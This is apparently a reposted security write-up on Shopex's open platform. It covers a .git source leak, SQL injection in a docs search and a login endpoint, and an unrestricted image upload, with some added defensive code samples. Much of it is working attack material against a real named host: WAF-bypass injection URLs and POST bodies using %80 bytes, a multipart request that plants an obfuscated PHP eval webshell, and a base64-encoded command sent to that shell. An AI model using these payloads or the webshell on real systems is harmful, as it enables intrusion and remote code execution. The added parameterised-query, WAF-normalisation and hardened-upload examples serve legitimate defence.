Shopex Open Platform SQL injection and Getshell

Source: Internet
Author: User
Tags: upload, php


SQL injection

BBScan found a .git information leak:

http://open.shopex.cn/.git/



rip-git.pl was used to pull the source code out of the exposed repository.

Auditing the source turns up an SQL injection:

open.shopex.cn\core\application\controllers\docs.php:

/**
 * API search list page
 *
 * @access public
 * @return void
 */
public function api_search($category_id)
{
    $this->data['navigations'][] = array('name' => 'development document', 'url' => '');
    $this->data['navigations'][] = array('name' => 'api document', 'url' => site_url('/docs/api_list/' . $category_id));
    $platform_id    = isset($_GET['platform_id']) ? $_GET['platform_id'] : 0;
    $docs_keyword   = isset($_GET['docs_keyword']) ? trim(urldecode($_GET['docs_keyword'])) : '';
    $method_type_id = isset($_GET['method_type_id']) ? $_GET['method_type_id'] : 0;

    /* change the layout of the development document page */
    $this->layout->layout('doc_details');

    /* load the API list model and get the API list data */
    $this->load->model('method_type_model');
    $api_list_data_temp = $this->method_type_model->get_api_list_all();
    foreach ($api_list_data_temp as $k => $v) {
        $api_list_data[$v['id']] = $v;
    }
    $this->data['api_list_data'] = $api_list_data;

    /* supported platform list */
    $this->load->model('platform_model');
    $platform_list = $this->platform_model->get_platform_list();
    $this->data['platform_list'] = $platform_list;

    /* condition filtering: the three request values are concatenated straight into SQL */
    $conditions = '1 = 1';
    if ($platform_id > 0) {
        $conditions .= ' AND pm.platform_id = ' . $platform_id;
    }
    if ($docs_keyword != '') {
        $conditions .= ' AND (m.name like "%' . $docs_keyword . '%" OR m.introduction like "%' . $docs_keyword . '%")';
    }

    /* filter on the left */
    $this->load->model('method_model');
    $filter_method_list = $this->method_model->get_method_search_list($conditions); // interface list
    $method_type_id_array = array();
    foreach ($filter_method_list as $k => $v) {
        $method_type_id_array[] = $v['method_type_id'];
    }
    if ($method_type_id > 0) {
        $conditions .= ' AND mthm.method_type_id = ' . $method_type_id;
    }

    /* load the API model */
    $this->load->model('method_model');
    $method_list_temp = $this->method_model->get_method_search_list($conditions); // interface list
    foreach ($method_list_temp as $k => $v) {
        $temp = isset($api_list_data[$v['method_type_id']]) ? $api_list_data[$v['method_type_id']]['name'] : 'temp';
        $method_list_group[$temp][] = $v;
    }
    $this->data['method_list_group']    = $method_list_group;
    $this->data['method_type_id_array'] = $method_type_id_array;
    $this->data['docs_keyword']         = $docs_keyword;
    $this->data['platform_id']          = $platform_id;
    $this->data['category_id']          = $category_id;
    $this->data['method_type_id']       = $method_type_id; // current list ID
    $this->layout->view('docs/api_search', $this->data);
}



Three parameters are injectable, since each is appended to $conditions without escaping or casting:

platform_id, docs_keyword and method_type_id
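The root cause is that the three values are concatenated into the condition string handed to get_method_search_list(). Below is an added example, not Shopex's code, of the same condition building done with bound parameters; the two integers are cast and the keyword is passed as data with its LIKE wildcards escaped. It runs stand-alone against an in-memory SQLite database; the tables method, platform_method and method_type_method and their columns are constructed stand-ins modelled on the aliases m, pm and mthm in the original query.

```php
<?php
// Added example (not Shopex's code): the condition building from api_search()
// redone with bound parameters. The schema below is a constructed stand-in whose
// names are assumptions modelled on the aliases m, pm and mthm in the original.

/**
 * Build a parameterised WHERE clause from the request parameters.
 * Returns array($whereSql, $bindings): integers are cast, the keyword is bound
 * as data and its LIKE wildcards are escaped so it cannot widen the pattern.
 */
function build_search_conditions(array $get)
{
    $platform_id    = isset($get['platform_id']) ? (int) $get['platform_id'] : 0;
    $method_type_id = isset($get['method_type_id']) ? (int) $get['method_type_id'] : 0;
    $docs_keyword   = isset($get['docs_keyword']) ? trim($get['docs_keyword']) : '';

    $where = array('1 = 1');
    $bind  = array();

    if ($platform_id > 0) {
        $where[] = 'pm.platform_id = ?';
        $bind[]  = $platform_id;
    }
    if ($docs_keyword !== '') {
        // '!' is declared as the LIKE escape character below, so escape it first,
        // then the wildcards; '!' works unchanged in both MySQL and SQLite
        $like = '%' . str_replace(array('!', '%', '_'), array('!!', '!%', '!_'), $docs_keyword) . '%';
        $where[] = "(m.name LIKE ? ESCAPE '!' OR m.introduction LIKE ? ESCAPE '!')";
        $bind[]  = $like;
        $bind[]  = $like;
    }
    if ($method_type_id > 0) {
        $where[] = 'mthm.method_type_id = ?';
        $bind[]  = $method_type_id;
    }
    return array(implode(' AND ', $where), $bind);
}

/** Run the search through a prepared statement and return the matching rows. */
function search_methods(PDO $db, array $get)
{
    list($where, $bind) = build_search_conditions($get);
    $sql = 'SELECT m.id, m.name FROM method m'
         . ' JOIN platform_method pm ON pm.method_id = m.id'
         . ' JOIN method_type_method mthm ON mthm.method_id = m.id'
         . ' WHERE ' . $where;
    $stmt = $db->prepare($sql);
    $stmt->execute($bind);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Stand-alone demo on an in-memory SQLite database with constructed rows.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE method (id INTEGER, name TEXT, introduction TEXT)');
$db->exec('CREATE TABLE platform_method (method_id INTEGER, platform_id INTEGER)');
$db->exec('CREATE TABLE method_type_method (method_id INTEGER, method_type_id INTEGER)');
$db->exec("INSERT INTO method VALUES (1, 'user.get', 'fetch a user'), (2, 'order.list', 'list orders')");
$db->exec('INSERT INTO platform_method VALUES (1, 1), (2, 1)');
$db->exec('INSERT INTO method_type_method VALUES (1, 3), (2, 4)');

// A normal search by platform and keyword.
print_r(search_methods($db, array('platform_id' => '1', 'docs_keyword' => 'user')));

// A platform_id of the shape used in this report casts to the integer 1, and the
// keyword travels as data, so the request is treated as "platform 1 plus a literal
// keyword" and never reaches the SQL parser as syntax.
print_r(search_methods($db, array(
    'platform_id'  => '1/extractvalue(1,concat(0x7e,user()))#',
    'docs_keyword' => '%" OR 1=1 #',
)));
```

The same shape carries over to CodeIgniter's own layer: pass $bind to $this->db->query($sql, $bind) instead of a raw $conditions string, and cast the two ids before they are used anywhere.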



Searching WooYun shows the following reports had already been submitted for this:

WooYun: Shopex SQL Injection somewhere on the Open Platform

WooYun: an SQL injection vulnerability exists on Shopex's official platform.

WooYun: ShopEx injection on a sub-site

The vulnerability was never fixed; a WAF was simply placed in front of it.

The application is built on the CI (CodeIgniter) framework, which by default strips bytes that are not valid UTF-8 from request parameters. Inserting a %80 byte inside a keyword therefore bypasses the WAF: the WAF sees us%80er and matches nothing, while CI drops the 0x80 byte and the database receives user().
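The defensive lesson is that a filter must see what the application will see. The following added example, which is not part of the original report, reproduces CodeIgniter's normalisation step and runs a signature check on a parameter both as received and after normalisation; the signature list and the inspect_param() helper are constructed for illustration, and mb_scrub() is used as a stand-in for the iconv //IGNORE call CodeIgniter 2 makes.

```php
<?php
// Added example, not part of the original report: a WAF-side check that
// normalises a parameter the way CodeIgniter will before matching signatures.
// The signature list and inspect_param() are constructed for illustration.

/**
 * Drop bytes that are not valid UTF-8, approximating CodeIgniter 2's
 * Utf8::clean_string() (which calls iconv with //IGNORE). Needs PHP 7.2+ for mb_scrub().
 */
function normalize_like_ci($value)
{
    $prev = mb_substitute_character();
    mb_substitute_character('none');      // remove, rather than replace, invalid bytes
    $clean = mb_scrub($value, 'UTF-8');
    mb_substitute_character($prev);
    return $clean;
}

/** Return the names of SQL functions that appear followed by an opening parenthesis. */
function matched_sql_functions($value)
{
    $signatures = array('extractvalue', 'updatexml', 'concat', 'user', 'version');
    $hits = array();
    foreach ($signatures as $name) {
        // byte-mode regex (no /u), so invalid bytes in $value cannot abort the match
        if (preg_match('/\b' . $name . '\s*\(/i', $value)) {
            $hits[] = $name;
        }
    }
    return $hits;
}

/** Inspect one raw query-string value both as received and as the application will see it. */
function inspect_param($rawValue)
{
    $decoded    = urldecode($rawValue);
    $normalised = normalize_like_ci($decoded);
    return array(
        'as_received'    => matched_sql_functions($decoded),
        'as_app_sees'    => matched_sql_functions($normalised),
        // invalid bytes that vanish on normalisation are a signal on their own:
        // legitimate keyword searches do not contain stray 0x80 bytes
        'bytes_stripped' => strlen($decoded) - strlen($normalised),
    );
}

// Constructed sample: the platform_id value of the shape used in this report.
print_r(inspect_param('1/extractvalue(1,concat%20(0x7e,us%80er(),0x3a,ver%80sion()))%23'));
```

Run on that sample, as_received lists only the function names that were not split by a %80 byte, while as_app_sees lists the user() and version() calls as well, and bytes_stripped is non-zero. A filter that matches only on the raw value misses exactly the difference between the two lists; matching on the normalised value, or simply rejecting parameters that lose bytes in normalisation, closes the gap.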



http://open.shopex.cn/docs/api_search/1?platform_id=1/extractvalue(1,concat%20(0x7e,us%80er(),0x3a,ver%80sion()))%23


Continuing through the code turns up an arbitrary file upload:

open.shopex.cn\core\application\controllers\uploads.php:

class Uploads extends CI_Controller
{
    /**
     * Homepage image upload
     *
     * @access public
     */
    public function home_img()
    {
        if (empty($_FILES['image'])) {
            $this->_return_msg('fail', 'the format of the uploaded content is incorrect!');
        }
        // only the client-supplied MIME type is checked
        if (substr($_FILES['image']['type'], 0, 5) != 'image') {
            $this->_return_msg('fail', 'check whether the image is uploaded!');
        }
        // the extension is taken from the client-supplied filename
        $image_name     = $_FILES['image']['name'];
        $image_name_exp = explode('.', $image_name);
        $image_name     = date('YmdHis') . mt_rand(0, 1) . '.' . $image_name_exp[1];
        $uploadfile     = FCPATH . 'uploads/home_img/' . $image_name;
        move_uploaded_file($_FILES['image']['tmp_name'], $uploadfile);
        $data['img'] = base_url('/uploads/home_img/' . $image_name);
        $this->_return_msg('succ', 'success', $data);
    }
    ...
}



A quirk in how PHP parses multipart/form-data part headers can be used to get past the WAF and upload a PHP shell:

POST /index.php/uploads/home_img HTTP/1.1
User-Agent: curl/7.33.0
Host: open.shopex.cn
Accept: */*
Proxy-Connection: Keep-Alive
Content-Length: 341
Content-Type: multipart/form-data; boundary=----,xxoo

------,xxoo
Content-Disposition: form-data; name="image"; filename="1.jpg"
Content-Type: image/png
------
Content-Disposition: form-data; name="image"; filename="1.php"
Content-Type: image/png

<script language="php">@preg_replace('/./e','@'.str_rot13('riny').'(bas'.'e64_decode($_POST[c]))', 'x');</script>
------------,xxoo--



Shell:

http://open.shopex.cn/uploads/home_img/201512122130440.php


POST /uploads/home_img/201512122130440.php HTTP/1.1
User-Agent: curl/7.33.0
Host: open.shopex.cn
Accept: */*
Proxy-Connection: Keep-Alive
Content-Length: 34
Content-Type: application/x-www-form-urlencoded

c=ZWNobyBgaWQ7cHdkO2xhc3QgLTIwYDs=

There is also an SQL injection in the passport login endpoint, using the same %80 trick to get past the WAF:

POST /index.php/passport/passport/login HTTP/1.1
Host: 122.144.135.142
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=368fe31461cc0ba9a3e38c0334145b35; CNZZDATA3868185=cnzz_eid%3D1466070748-1449902718-%26ntime%3D1449902718
Content-Length: 131

biz_id=&entid=')or updatexml(1,co%80ncat(0x7e,us%80er(),ver%80sion()),1)#&pwd=xx&auth_code=cqac&subOk=%E7%99%BB%E5%BD%95&logOk=true

Solution:

Delete the .git directory from the web root, or deny access to it;

Fix the SQL injections rather than relying on the WAF;

Restrict the suffixes the upload function accepts and add user permission control.
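As an added example of the third point, and not Shopex's code, here is a hardened replacement for the home_img() handler shown earlier. It ignores the client's declared type and filename entirely: the content is sniffed, the extension is assigned from the sniffed type, and the stored name is random. The SafeImageUpload class name, the size limit, the destination directory and the reuse of the original's _return_msg() helper are assumptions.

```php
<?php
// Added example, not Shopex's code: a hardened replacement for Uploads::home_img().
// Nothing from the client is trusted: not $_FILES['image']['type'], not the
// filename, not its extension. Class name, limits and directory are assumptions.

class SafeImageUpload
{
    // Allowed sniffed types and the extension the server will assign for each.
    private static $allowed = array(
        'image/jpeg' => 'jpg',
        'image/png'  => 'png',
        'image/gif'  => 'gif',
    );
    private static $maxBytes = 2097152; // 2 MiB, an assumed limit

    /**
     * Validate one $_FILES entry and move it into $dir.
     * Returns the stored filename, or throws RuntimeException on any failure.
     */
    public static function store(array $file, $dir)
    {
        if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
            throw new RuntimeException('upload failed');
        }
        // Must have arrived through PHP's upload handling, not a path the caller supplied.
        if (!is_uploaded_file($file['tmp_name'])) {
            throw new RuntimeException('not an uploaded file');
        }
        if ($file['size'] > self::$maxBytes) {
            throw new RuntimeException('file too large');
        }
        // Sniff the bytes instead of believing the Content-Type sent by the client.
        $finfo = new finfo(FILEINFO_MIME_TYPE);
        $mime  = $finfo->file($file['tmp_name']);
        if (!isset(self::$allowed[$mime])) {
            throw new RuntimeException('unsupported image type');
        }
        // Consistency check: the decoder must also accept it as an image.
        if (@getimagesize($file['tmp_name']) === false) {
            throw new RuntimeException('not a valid image');
        }
        // Server-chosen name: random, with the extension derived from the sniffed type,
        // so a second filename smuggled into the multipart headers has no effect.
        $name = bin2hex(random_bytes(16)) . '.' . self::$allowed[$mime];
        $dest = rtrim($dir, '/') . '/' . $name;
        if (!move_uploaded_file($file['tmp_name'], $dest)) {
            throw new RuntimeException('could not store file');
        }
        chmod($dest, 0644);
        return $name;
    }
}

// Usage inside the controller, reusing the original's _return_msg() helper (assumed):
//
//   public function home_img()
//   {
//       // permission control: only an authenticated user may upload at all
//       if (!$this->session->userdata('user_id')) {
//           $this->_return_msg('fail', 'login required');
//           return;
//       }
//       try {
//           $name = SafeImageUpload::store($_FILES['image'], FCPATH . 'uploads/home_img');
//           $this->_return_msg('succ', 'success', array('img' => base_url('/uploads/home_img/' . $name)));
//       } catch (RuntimeException $e) {
//           $this->_return_msg('fail', $e->getMessage());
//       }
//   }
```

Two caveats a reviewer would still raise: image polyglots can pass both the sniff and getimagesize(), so the upload directory must additionally be served with script execution disabled (no PHP handler for that path), and the random name means the response, not the request, is the only place the client learns where the file landed.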
